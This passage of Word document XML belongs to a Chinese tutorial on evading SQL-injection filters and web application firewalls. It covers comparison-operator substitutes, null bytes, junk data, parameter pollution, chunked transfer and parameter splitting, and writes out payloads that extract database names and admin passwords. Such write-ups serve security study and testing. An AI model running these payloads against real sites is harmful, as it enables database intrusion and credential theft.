                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:p w14:paraId="200E8F70">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="u68b9fbc4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Least()：返回最小值</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:p w14:paraId="7AF337FF">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="u32a738b4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>上面两个函数的比较规则</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:p w14:paraId="0DC9353A">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09" w:name="RnfiB"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>如果任何参数为NULL，则两个函数都将立即返回NULL，不进行任何比较</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如果在INT或REAL上下文中使用函数，或者所有参数都是整数值或REAL值，那么他们将分别作为INT或REAL来比较</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如果参数有数字和字符串组成，则函数将他们作为数字比较</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如果至少有一个参数是非二进制(字符)字符串，则函数将参数作为非二进制字符串来比较</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在所有其他情况下，函数将作为二进制字符串进行比较</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="109"/>
    <w:p w14:paraId="1D029D0E">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="u844ce5e5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同样是在使用盲注的时候，在使用二分法查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用greatest来尝试绕过：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:p w14:paraId="6B360C33">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11" w:name="CVJaG"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Select * from users where id=1 and ascii(substr(database(),1,1))&gt;97</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等价于</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Select * from users where id=1 and greatest(ascii(subatr(database(),1,1)),64)=64</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使用between、and</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Between a and b;</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Between 1 and 1  ===&gt;  =1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="111"/>
    <w:p w14:paraId="623F7D87">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="ue0548f35"/>
      <w:bookmarkStart w:id="113" w:name="u209e17dc"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="28092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6519334" cy="3135639"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:bookmarkEnd w:id="113"/>
    <w:p w14:paraId="5A7645B3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="emovc"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.8、Or and xor not绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="114"/>
    <w:p w14:paraId="044EB1C5">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15" w:name="s9DnQ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>And == &amp;&amp;</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Or == ||</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Xor = |</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Not = !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="115"/>
    <w:p w14:paraId="18F43D47">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="Nzrcn"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.9、注释符号（# --+）过滤绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="116"/>
    <w:p w14:paraId="3E217056">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17" w:name="vp4gY"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Id = 1' union select 1,2,3 || '1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="117"/>
    <w:p w14:paraId="011A388C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="yDrCs"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.10、+绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="118"/>
    <w:p w14:paraId="6FA33C78">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19" w:name="p84QH"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>使用like、rlike、regexp或者使用&lt;或者&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="119"/>
    <w:p w14:paraId="49F14B09">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="UunKt"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.11、空字节绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="120"/>
    <w:p w14:paraId="6BACB674">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="u7bb5e83c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>通常的输入过滤器都是在应用程序之外的代码实现的。比如入侵检测系统(IDS)，这些系统一般是由原生编程语言开发而成的，比如c++，为什么空字节能起作用呢？就是因为在原生编程语言中，根据字符串起始位置到第一个出现空字节的位置来确定字符串长度，所以说空字节就有效终止了字符串。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="121"/>
    <w:p w14:paraId="0E7C9985">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="u3517c282"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只需要在过滤器组织的字符串前面提供一个采用URL编码的空字节即可，例如：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="122"/>
    <w:p w14:paraId="29167BD2">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23" w:name="qUyRv"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1.%00' union select username,password from users where username='admin' --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:p w14:paraId="4A3F00D1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="UTs9t"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.11、垃圾数据绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="124"/>
    <w:p w14:paraId="361CDBE7">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="u4eb83dfd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在很多GET传参的网站，过滤函数对传入的内容有长度限制的时候，会导致GET传入一些垃圾数据的时候，长于过滤的长度的时候就可以实现绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="125"/>
    <w:p w14:paraId="3EC83555">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="zoBKX"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>2.12、等价函数绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:p w14:paraId="7A5C8A3E">
      <w:pPr>
        <w:pStyle w:val="24"/>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F2F2F2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="AZWzC"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hex()、bin() ==&gt; ascii()</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sleep() ==&gt;benchmark()</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concat_ws()==&gt;group_concat()</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mid()、substr() ==&gt; substring()</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@@user ==&gt; user()</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@@datadir ==&gt; datadir()</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举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>或者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>substr((select 'password'),1,1) = 0x70</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>strcmp(left('password',1), 0x69) = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>strcmp(left('password',1), 0x70) = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>strcmp(left('password',1), 0x71) = -1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="127"/>
    <w:p w14:paraId="6AF4BB01">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="e3Go1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.13、参数污染</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:p w14:paraId="2D56F234">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="u147b0c19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在 php 语言中 id=1&amp;id=2 后面的值会自动覆盖前面的值，不同的语言有不同的特性。可以利用这点绕过一 些 waf 的拦截。以下是其他污染特性</w:t>
      </w:r>
      <w:bookmarkStart w:id="130" w:name="ua22ae19c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="19215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6366934" cy="2094414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:p w14:paraId="79E3656E">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="ufa5c4ed6"/>
      <w:bookmarkStart w:id="132" w:name="ucd5877fa"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="2955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6417734" cy="3247002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:p w14:paraId="5ADD987D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="UhUld"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.14、脏数据溢出绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:p w14:paraId="0D07265A">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="ua49dd381"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据太多超过waf检测范围，然后造成绕过,前面填垃圾数据后面填要注入的SQL语句，如果是GET传参，参数值超过GET所能运行的长度可能无法利用，所以最好是POST传参(前提是对方支持POST传参)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:p w14:paraId="290AFBFB">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="u33f7023a"/>
      <w:bookmarkStart w:id="136" w:name="u6cb34b9d"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="17519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6417734" cy="1925100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkStart w:id="137" w:name="u34ee8e11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="26809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6333066" cy="2906847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:p w14:paraId="1EE48026">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="uxISO"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.15、分块传输</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="138"/>
    <w:p w14:paraId="5E405496">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="u8df54c9f"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分块传输编码是只在HTTP协议1.1版本中提供的一种数据传送机制。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="139"/>
    <w:p w14:paraId="27C5606E">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="u4d4e4215"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以往HTTP的应答中数据是整个一起发送的，并在应答头里Content-Length字段标识了数据的长度，以便客户端知道应答消息的结束。分块传输编码允许服务器在最后发送消息头字段。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:p w14:paraId="59F866C5">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="u0dee35d5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>例如在头中添加散列签名。对于压缩传输传输而言，可以一边压缩一边传输，将本该一次性传输的完整数据分块传输，从而绕过waf的检测。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="142" w:name="u5e647b2a"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="31254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6350000" cy="3397250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:p w14:paraId="4E058A7C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="UiH3n"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.16、参数拆分绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:p w14:paraId="63365126">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="uba64d7c2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配合多个参数的传参，将注入的内容拼接到同一条 SQL 语句中，可以将注入语句分割插入绕过waf拦截。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="144"/>
    <w:p w14:paraId="3FD2AA6A">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="ue92323c2"/>
      <w:bookmarkStart w:id="146" w:name="u83cd78bf"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5502910" cy="3609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503334" cy="3610500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:bookmarkEnd w:id="146"/>
    <w:p w14:paraId="3380BC77">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="mECf8"/>
      <w:r>
        <w:rPr>
